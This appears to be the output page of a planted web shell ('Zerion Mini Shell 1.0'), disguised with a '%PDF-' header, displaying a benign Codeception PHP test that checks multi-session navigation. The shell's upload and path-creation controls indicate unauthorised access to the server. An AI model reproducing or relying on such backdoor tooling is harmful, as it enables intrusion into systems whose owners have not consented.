%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/local/prospamfilter/vendor/codeception/codeception/tests/web/
Upload File :
Create Path :
Current File : //usr/local/prospamfilter/vendor/codeception/codeception/tests/web/FriendsCept.php

<?php
$I = new WebGuy($scenario);
$I->wantTo('call friends to try multi session');
$I->amOnPage('/info');
$jon = $I->haveFriend('jon');
$jon->does(function (WebGuy $I) {
    $I->amOnPage('/');
    $I->seeInCurrentUrl('/');
});
$I->seeInCurrentUrl('/info');

Zerion Mini Shell 1.0